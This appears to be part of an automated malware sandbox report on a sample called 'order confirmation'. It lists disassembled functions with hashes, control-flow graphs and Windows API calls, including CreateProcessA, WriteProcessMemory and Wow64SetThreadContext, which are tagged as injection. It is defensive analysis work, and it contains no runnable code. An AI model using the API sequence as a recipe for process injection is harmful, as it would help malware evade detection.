                                                    Function 082615F0 Relevance: .4, Instructions: 427COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669817607.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_8260000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 216f1db1d6ec9d73f51935c0e1aee2080bd2ea5d3998b2f74c91174dbc82a140
                                                    • Instruction ID: 52ba1d31b7a0c87ddb935bfd9352ec68354f2df96798e67d3c409a27fd56e925
                                                    • Opcode Fuzzy Hash: 216f1db1d6ec9d73f51935c0e1aee2080bd2ea5d3998b2f74c91174dbc82a140
                                                    • Instruction Fuzzy Hash: D0F1FF71711302CFE726DB75C454B6AB7F6AF89312F0444AED04ACB2A1CB34E851C761
                                                    Function 01744AE0 Relevance: .3, Instructions: 286COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b376d5f8f2b581ea62c4e50cdef2d389a324a77d03dd8c575cdb870f4e7cff1
                                                    • Instruction ID: c9d7a177be4f4e6784f66d8b5c19256308f8489c48fb18155bd23a0c414b4050
                                                    • Opcode Fuzzy Hash: 6b376d5f8f2b581ea62c4e50cdef2d389a324a77d03dd8c575cdb870f4e7cff1
                                                    • Instruction Fuzzy Hash: E2C19B738442A29BCB05EE14CC987D5B764FB053EDB2C41CCDE452B645D32A7D8AEBA0
                                                    Function 07D92A90 Relevance: .3, Instructions: 285COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 95cc549808a3a865d8aead197285e64bcd8f5ef4edd7c4e28d66115c6132133e
                                                    • Instruction ID: 8a3b02a28104c204b36e375f33f054ff9ab3845d18e58c17937fa30d210cafb3
                                                    • Opcode Fuzzy Hash: 95cc549808a3a865d8aead197285e64bcd8f5ef4edd7c4e28d66115c6132133e
                                                    • Instruction Fuzzy Hash: 5BC149B1A00259DFCF25DFA5C880799FBB2BF88310F14C5AAD449AB255EB30A985CF50
                                                    Function 07D88CD0 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a81ea3aef92d40baf5104cf185662a819bb7e94cbfd9a4a4f82a4d840cd550e
                                                    • Instruction ID: 385fb5cb638075787cb9b826aafeb1fd7ded3ac4ada9e28535a10fdcc256c47b
                                                    • Opcode Fuzzy Hash: 0a81ea3aef92d40baf5104cf185662a819bb7e94cbfd9a4a4f82a4d840cd550e
                                                    • Instruction Fuzzy Hash: 8B2149B1D056589BEB18CF67C8543EEFBF6EF8A300F04C16AD409A6254DB740945CF91
                                                    Function 0174D330 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0174D3BE
                                                    • GetCurrentThread.KERNEL32 ref: 0174D3FB
                                                    • GetCurrentProcess.KERNEL32 ref: 0174D438
                                                    • GetCurrentThreadId.KERNEL32 ref: 0174D491
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 59469d536df92a0c22aa75a58e2c83399ba257e202994114e2a8343abc63a130
                                                    • Instruction ID: d3abc2d482107686b9c946c1ad59484737640516a4adba2caf87d994981a5b18
                                                    • Opcode Fuzzy Hash: 59469d536df92a0c22aa75a58e2c83399ba257e202994114e2a8343abc63a130
                                                    • Instruction Fuzzy Hash: 6C5167B09003498FEB18DFA9D448BDEBBF1BF88314F208459E419A73A0DB746948CF65
                                                    Function 0174D340 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0174D3BE
                                                    • GetCurrentThread.KERNEL32 ref: 0174D3FB
                                                    • GetCurrentProcess.KERNEL32 ref: 0174D438
                                                    • GetCurrentThreadId.KERNEL32 ref: 0174D491
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 48931b2c804f7989716dba1a536a3cb54fa972d36e7c11118f8bc104010f6823
                                                    • Instruction ID: 3edc2a6b5e33555b3c08f60409079c76d5c7c486fba20bfad1654fb26f144350
                                                    • Opcode Fuzzy Hash: 48931b2c804f7989716dba1a536a3cb54fa972d36e7c11118f8bc104010f6823
                                                    • Instruction Fuzzy Hash: EB5158B09017498FEB18DFAAD448BDEBBF1BF88314F208419E419A7360DB746948CF65
                                                    Function 07D8E88C Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 44 7d8e88c-7d8e896 45 7d8e898-7d8e89c 44->45 46 7d8e89d-7d8e92d 44->46 45->46 48 7d8e92f-7d8e939 46->48 49 7d8e966-7d8e986 46->49 48->49 50 7d8e93b-7d8e93d 48->50 56 7d8e988-7d8e992 49->56 57 7d8e9bf-7d8e9ee 49->57 51 7d8e93f-7d8e949 50->51 52 7d8e960-7d8e963 50->52 54 7d8e94b 51->54 55 7d8e94d-7d8e95c 51->55 52->49 54->55 55->55 58 7d8e95e 55->58 56->57 59 7d8e994-7d8e996 56->59 65 7d8e9f0-7d8e9fa 57->65 66 7d8ea27-7d8eae1 CreateProcessA 57->66 58->52 61 7d8e998-7d8e9a2 59->61 62 7d8e9b9-7d8e9bc 59->62 63 7d8e9a4 61->63 64 7d8e9a6-7d8e9b5 61->64 62->57 63->64 64->64 67 7d8e9b7 64->67 65->66 68 7d8e9fc-7d8e9fe 65->68 77 7d8eaea-7d8eb70 66->77 78 7d8eae3-7d8eae9 66->78 67->62 70 7d8ea00-7d8ea0a 68->70 71 7d8ea21-7d8ea24 68->71 72 7d8ea0c 70->72 73 7d8ea0e-7d8ea1d 70->73 71->66 72->73 73->73 75 7d8ea1f 73->75 75->71 88 7d8eb80-7d8eb84 77->88 89 7d8eb72-7d8eb76 77->89 78->77 90 7d8eb94-7d8eb98 88->90 91 7d8eb86-7d8eb8a 88->91 89->88 92 7d8eb78 89->92 94 7d8eba8-7d8ebac 90->94 95 7d8eb9a-7d8eb9e 90->95 91->90 93 7d8eb8c 91->93 92->88 93->90 97 7d8ebbe-7d8ebc5 94->97 98 7d8ebae-7d8ebb4 94->98 95->94 96 7d8eba0 95->96 96->94 99 7d8ebdc 97->99 100 7d8ebc7-7d8ebd6 97->100 98->97 101 7d8ebdd 99->101 100->99 101->101
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D8EACE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: f833f81048822a10cd5d41a4363e23d4a31a255d37405b9e232c8023e8522921
                                                    • Instruction ID: 5db46f00b8e31f160f24e196d4a7381d4b339d4b62fc6f7fc97eebedb68e2cd3
                                                    • Opcode Fuzzy Hash: f833f81048822a10cd5d41a4363e23d4a31a255d37405b9e232c8023e8522921
                                                    • Instruction Fuzzy Hash: B8A14CB1D0021ADFEB60EF65C841BDDFBB2BF44710F1485A9D849A7280DB749985CF91
                                                    Function 07D8E898 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 103 7d8e898-7d8e92d 106 7d8e92f-7d8e939 103->106 107 7d8e966-7d8e986 103->107 106->107 108 7d8e93b-7d8e93d 106->108 114 7d8e988-7d8e992 107->114 115 7d8e9bf-7d8e9ee 107->115 109 7d8e93f-7d8e949 108->109 110 7d8e960-7d8e963 108->110 112 7d8e94b 109->112 113 7d8e94d-7d8e95c 109->113 110->107 112->113 113->113 116 7d8e95e 113->116 114->115 117 7d8e994-7d8e996 114->117 123 7d8e9f0-7d8e9fa 115->123 124 7d8ea27-7d8eae1 CreateProcessA 115->124 116->110 119 7d8e998-7d8e9a2 117->119 120 7d8e9b9-7d8e9bc 117->120 121 7d8e9a4 119->121 122 7d8e9a6-7d8e9b5 119->122 120->115 121->122 122->122 125 7d8e9b7 122->125 123->124 126 7d8e9fc-7d8e9fe 123->126 135 7d8eaea-7d8eb70 124->135 136 7d8eae3-7d8eae9 124->136 125->120 128 7d8ea00-7d8ea0a 126->128 129 7d8ea21-7d8ea24 126->129 130 7d8ea0c 128->130 131 7d8ea0e-7d8ea1d 128->131 129->124 130->131 131->131 133 7d8ea1f 131->133 133->129 146 7d8eb80-7d8eb84 135->146 147 7d8eb72-7d8eb76 135->147 136->135 148 7d8eb94-7d8eb98 146->148 149 7d8eb86-7d8eb8a 146->149 147->146 150 7d8eb78 147->150 152 7d8eba8-7d8ebac 148->152 153 7d8eb9a-7d8eb9e 148->153 149->148 151 7d8eb8c 149->151 150->146 151->148 155 7d8ebbe-7d8ebc5 152->155 156 7d8ebae-7d8ebb4 152->156 153->152 154 7d8eba0 153->154 154->152 157 7d8ebdc 155->157 158 7d8ebc7-7d8ebd6 155->158 156->155 159 7d8ebdd 157->159 158->157 159->159
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D8EACE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: f93ff18ee7ca7b010ffaec429f5b04e87c2011eb711fe5f9477cba701cc58d48
                                                    • Instruction ID: a2f09d8fc171d62410f8a35b7220509ec3c63473153ce1a558e76017fc8dd48c
                                                    • Opcode Fuzzy Hash: f93ff18ee7ca7b010ffaec429f5b04e87c2011eb711fe5f9477cba701cc58d48
                                                    • Instruction Fuzzy Hash: F7914CB1D0021ADFEB60EF69C8417DDFBB2BF44710F148569D849A7280DB749985CF91
                                                    Function 0174B0A8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 161 174b0a8-174b0b7 163 174b0e3-174b0e7 161->163 164 174b0b9-174b0c6 call 174ad38 161->164 166 174b0e9-174b0f3 163->166 167 174b0fb-174b13c 163->167 169 174b0dc 164->169 170 174b0c8 164->170 166->167 173 174b13e-174b146 167->173 174 174b149-174b157 167->174 169->163 217 174b0ce call 174b340 170->217 218 174b0ce call 174b330 170->218 173->174 175 174b159-174b15e 174->175 176 174b17b-174b17d 174->176 178 174b160-174b167 call 174ad44 175->178 179 174b169 175->179 181 174b180-174b187 176->181 177 174b0d4-174b0d6 177->169 180 174b218-174b2d8 177->180 183 174b16b-174b179 178->183 179->183 212 174b2e0-174b30b GetModuleHandleW 180->212 213 174b2da-174b2dd 180->213 184 174b194-174b19b 181->184 185 174b189-174b191 181->185 183->181 187 174b19d-174b1a5 184->187 188 174b1a8-174b1b1 call 174ad54 184->188 185->184 187->188 193 174b1b3-174b1bb 188->193 194 174b1be-174b1c3 188->194 193->194 195 174b1c5-174b1cc 194->195 196 174b1e1-174b1ee 194->196 195->196 198 174b1ce-174b1de call 174ad64 call 174ad74 195->198 203 174b1f0-174b20e 196->203 204 174b211-174b217 196->204 198->196 203->204 214 174b314-174b328 212->214 215 174b30d-174b313 212->215 213->212 215->214 217->177 218->177
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0174B2FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 140d27de1a85a941b8a11ea4954b5909ba9e95468bc6dc77383bc3b840082509
                                                    • Instruction ID: 6583a04ca5da22e7edb23b4e110e3326acdd3ac709162ed70bad32dd4f655e2e
                                                    • Opcode Fuzzy Hash: 140d27de1a85a941b8a11ea4954b5909ba9e95468bc6dc77383bc3b840082509
                                                    • Instruction Fuzzy Hash: DF711370A00B058FEB25DF6AD44475AFBF1FF88200F008A2DD48AD7A54DB75E949CB91
                                                    Function 017458ED Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 219 17458ed-17458ee 220 17458f0 219->220 221 17458f1-17458f2 219->221 220->221 222 17458f4 221->222 223 17458f5-17459b9 CreateActCtxA 221->223 222->223 225 17459c2-1745a1c 223->225 226 17459bb-17459c1 223->226 233 1745a1e-1745a21 225->233 234 1745a2b-1745a2f 225->234 226->225 233->234 235 1745a40 234->235 236 1745a31-1745a3d 234->236 238 1745a41 235->238 236->235 238->238
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 017459A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 26f3b6f403d41be962d102f6280803487e768b5865c95d369f76e7d4bf208399
                                                    • Instruction ID: 27ed9452666aa48cbb3e23a010d40f80b420534a383afb807826bdc44fdcc7a9
                                                    • Opcode Fuzzy Hash: 26f3b6f403d41be962d102f6280803487e768b5865c95d369f76e7d4bf208399
                                                    • Instruction Fuzzy Hash: 5641F1B1D00319CFEB24DFA9C884BCEBBB6BF89704F20816AD408AB251DB756945CF50
                                                    Function 01744514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 239 1744514-17459b9 CreateActCtxA 242 17459c2-1745a1c 239->242 243 17459bb-17459c1 239->243 250 1745a1e-1745a21 242->250 251 1745a2b-1745a2f 242->251 243->242 250->251 252 1745a40 251->252 253 1745a31-1745a3d 251->253 255 1745a41 252->255 253->252 255->255
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 017459A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: aee81c8d6260130adf28514b226520aea56fc5cb61601bea5350d1fa8d53634b
                                                    • Instruction ID: 7077299c384e1fdee800dd4a7d3aa718b0a80f0525e029a74bf8214d90e8573a
                                                    • Opcode Fuzzy Hash: aee81c8d6260130adf28514b226520aea56fc5cb61601bea5350d1fa8d53634b
                                                    • Instruction Fuzzy Hash: 7B41C0B1D0071DCFEB24DFAAC88479EBBB5BF89704F20816AD408AB251DB756945CF90
                                                    Function 07D93468 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 256 7d93468-7d9347a 257 7d93482-7d9348d 256->257 258 7d9347d call 7d91254 256->258 259 7d9348f-7d9349f 257->259 260 7d934a2-7d934b4 257->260 258->257 263 7d93528-7d93534 260->263 264 7d934b6-7d93527 CreateIconFromResourceEx 260->264 265 7d9353d-7d9355a 263->265 266 7d93536-7d9353c 263->266 264->263 266->265
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CreateFromIconResource
                                                    • String ID:
                                                    • API String ID: 3668623891-0
                                                    • Opcode ID: a766ab73c94cca85b9be95bc857985ba240843409da3ba38b3b3c80531ef89e3
                                                    • Instruction ID: d07eb3992ac51683ed9a9dc7f1c0cde341e7b0c5a4205992d645d975ca6a8089
                                                    • Opcode Fuzzy Hash: a766ab73c94cca85b9be95bc857985ba240843409da3ba38b3b3c80531ef89e3
                                                    • Instruction Fuzzy Hash: B9318A71804389EFCF11DFA9D840ADEBFF8EB49311F14846AE554AB251C3359854DBA1
                                                    Function 07D9C9A8 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 269 7d9c9a8-7d9c9fc 271 7d9c9fe-7d9ca04 269->271 272 7d9ca07-7d9ca16 269->272 271->272 273 7d9ca18 272->273 274 7d9ca1b-7d9ca54 DrawTextExW 272->274 273->274 275 7d9ca5d-7d9ca7a 274->275 276 7d9ca56-7d9ca5c 274->276 276->275
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07D9CA47
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: a90f81e5a7f13e9941e6748aaf16f02d140a5d03018b730c6746bfd1ce0da4e2
                                                    • Instruction ID: bdb65c4bd2a5f5770f3a81f8908b2143d585ddfe8aa6c0309cf5b6a272f87d6d
                                                    • Opcode Fuzzy Hash: a90f81e5a7f13e9941e6748aaf16f02d140a5d03018b730c6746bfd1ce0da4e2
                                                    • Instruction Fuzzy Hash: 6331E3B5D103499FDF10CFAAD980ADEFBF5BB48220F14842AE918A7350C774A940CFA0
                                                    Function 07D8E60E Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 279 7d8e60e-7d8e65e 281 7d8e66e-7d8e6ad WriteProcessMemory 279->281 282 7d8e660-7d8e66c 279->282 284 7d8e6af-7d8e6b5 281->284 285 7d8e6b6-7d8e6e6 281->285 282->281 284->285
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D8E6A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: ac6c6cc8610e78f14b5f096efbe33d091e38ca66d2db0bbf8999f2334c7ac116
                                                    • Instruction ID: bc5020dfd896444d9b473d426b21dbb09255fcada03757fc957f0e54b83c1cc1
                                                    • Opcode Fuzzy Hash: ac6c6cc8610e78f14b5f096efbe33d091e38ca66d2db0bbf8999f2334c7ac116
                                                    • Instruction Fuzzy Hash: 462106B19103499FDB54DFAAC881BEEBBF5BF88310F10882AE919A7250C7789544CF60
                                                    Function 07D8E610 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 289 7d8e610-7d8e65e 291 7d8e66e-7d8e6ad WriteProcessMemory 289->291 292 7d8e660-7d8e66c 289->292 294 7d8e6af-7d8e6b5 291->294 295 7d8e6b6-7d8e6e6 291->295 292->291 294->295
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D8E6A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 3f91a3b606f90ce4024308379a2d6ac9568a29427410d302113f8e1a960dc83b
                                                    • Instruction ID: cf8307fa8816baa4e1164210a4c44cbc475a68ff793a24b088663af272efde8b
                                                    • Opcode Fuzzy Hash: 3f91a3b606f90ce4024308379a2d6ac9568a29427410d302113f8e1a960dc83b
                                                    • Instruction Fuzzy Hash: D62117B19003499FDB10DFAAC881BDEBBF5BF88310F108829E918A7240C7789544CBA4
                                                    Function 07D9C9B0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 299 7d9c9b0-7d9c9fc 300 7d9c9fe-7d9ca04 299->300 301 7d9ca07-7d9ca16 299->301 300->301 302 7d9ca18 301->302 303 7d9ca1b-7d9ca54 DrawTextExW 301->303 302->303 304 7d9ca5d-7d9ca7a 303->304 305 7d9ca56-7d9ca5c 303->305 305->304
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07D9CA47
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: a997ad3fa42f351cceec5ccfe084154565e166da890534f1774b0a14cbdb7c38
                                                    • Instruction ID: 81012d2cabcf10ae19e692bb7f4bf2a8c7ce1ffa2c7ef20a55919a401baf717f
                                                    • Opcode Fuzzy Hash: a997ad3fa42f351cceec5ccfe084154565e166da890534f1774b0a14cbdb7c38
                                                    • Instruction Fuzzy Hash: 9921C3B5D103499FDB10CFAAD980A9EFBF5BB48220F14842AE919A7250D774A944CFA0
                                                    Function 07D8E6F8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 318 7d8e6f8-7d8e78d ReadProcessMemory 321 7d8e78f-7d8e795 318->321 322 7d8e796-7d8e7c6 318->322 321->322
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D8E780
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 27dacb85f7c280169f462fc86ef807e8311134528f9545d70e8cea52715c94be
                                                    • Instruction ID: 5129e676c00ec4e998231e44359b25c5e4507842c7c62839e3e4d4dba2bb375c
                                                    • Opcode Fuzzy Hash: 27dacb85f7c280169f462fc86ef807e8311134528f9545d70e8cea52715c94be
                                                    • Instruction Fuzzy Hash: 3D2126B18007499FDB10DFAAC881AEEBBF5BF88310F10842AE959A7250C73995409F60
                                                    Function 07D8E038 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 308 7d8e038-7d8e08b 310 7d8e09b-7d8e0cb Wow64SetThreadContext 308->310 311 7d8e08d-7d8e099 308->311 313 7d8e0cd-7d8e0d3 310->313 314 7d8e0d4-7d8e104 310->314 311->310 313->314
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D8E0BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: fd9879a2e53e0e5fbaf7a06980ebd3f9fe078914ddb77f7393ba410d3bc60956
                                                    • Instruction ID: 442abf0a6273bc740c592c75b2448fece7955dd9f3685e073fbf69881682c585
                                                    • Opcode Fuzzy Hash: fd9879a2e53e0e5fbaf7a06980ebd3f9fe078914ddb77f7393ba410d3bc60956
                                                    • Instruction Fuzzy Hash: EF2128B1D003099FDB54DFAAC4857EEBBF4AF88314F24882AD519A7240CB789945CF64
                                                    Function 07D8E700 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D8E780
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 35481383227f373eff04524e1201a00fa499c57025ca456484373e78d4e2e4bc
                                                    • Instruction ID: 96bf4f874ef3db260a57b03f31315c7cad3f60a0f3abb7e7c83a77ac5907097e
                                                    • Opcode Fuzzy Hash: 35481383227f373eff04524e1201a00fa499c57025ca456484373e78d4e2e4bc
                                                    • Instruction Fuzzy Hash: 5D21E6B18003599FDB10DFAAC881BEEFBF5FF48310F548429E959A7240C7799544DBA4
                                                    Function 07D8E040 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 326 7d8e040-7d8e08b 328 7d8e09b-7d8e0cb Wow64SetThreadContext 326->328 329 7d8e08d-7d8e099 326->329 331 7d8e0cd-7d8e0d3 328->331 332 7d8e0d4-7d8e104 328->332 329->328 331->332
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D8E0BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 7fde7b11218dc541937ad1fd11f7b8294b70fd73b9f49cac89bad091fe745419
                                                    • Instruction ID: 8dcaa2f6a805d4b103f4af594e6a6d1a05b817f9a02d376b5b2574c2daa6b61f
                                                    • Opcode Fuzzy Hash: 7fde7b11218dc541937ad1fd11f7b8294b70fd73b9f49cac89bad091fe745419
                                                    • Instruction Fuzzy Hash: 7C2118B19003099FDB50DFAAC4857AEFBF4EF88324F148829D559A7240CB789945CFA5
